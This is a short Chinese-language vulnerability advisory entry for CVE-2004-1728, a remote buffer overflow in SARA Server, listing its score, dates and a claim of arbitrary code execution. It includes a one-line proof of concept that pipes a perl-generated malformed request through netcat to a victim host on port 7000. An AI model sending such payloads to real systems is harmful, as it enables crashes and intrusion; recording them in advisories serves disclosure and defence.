SARA Server远程缓冲区溢出漏洞 CVE-2004-1728 CNNVD-200408-203 CNVD-2004-2322

7.5 AV AC AU C I A
发布: 2004-08-20
修订: 2017-07-11

SARA Server是British National校园网的服务程序。 SARA Server存在多个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限在系统上执行任意指令。 提交类似如下的畸形请求,可导致程序发生缓冲区溢出: perl -e \'\'print \"SUCK\" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);\'\' | netcat victim 7000 精心构建提交数据可能以进程权限在系统上执行任意指令。

0%
当前有2条漏洞利用/PoC
当前有1条受影响产品信息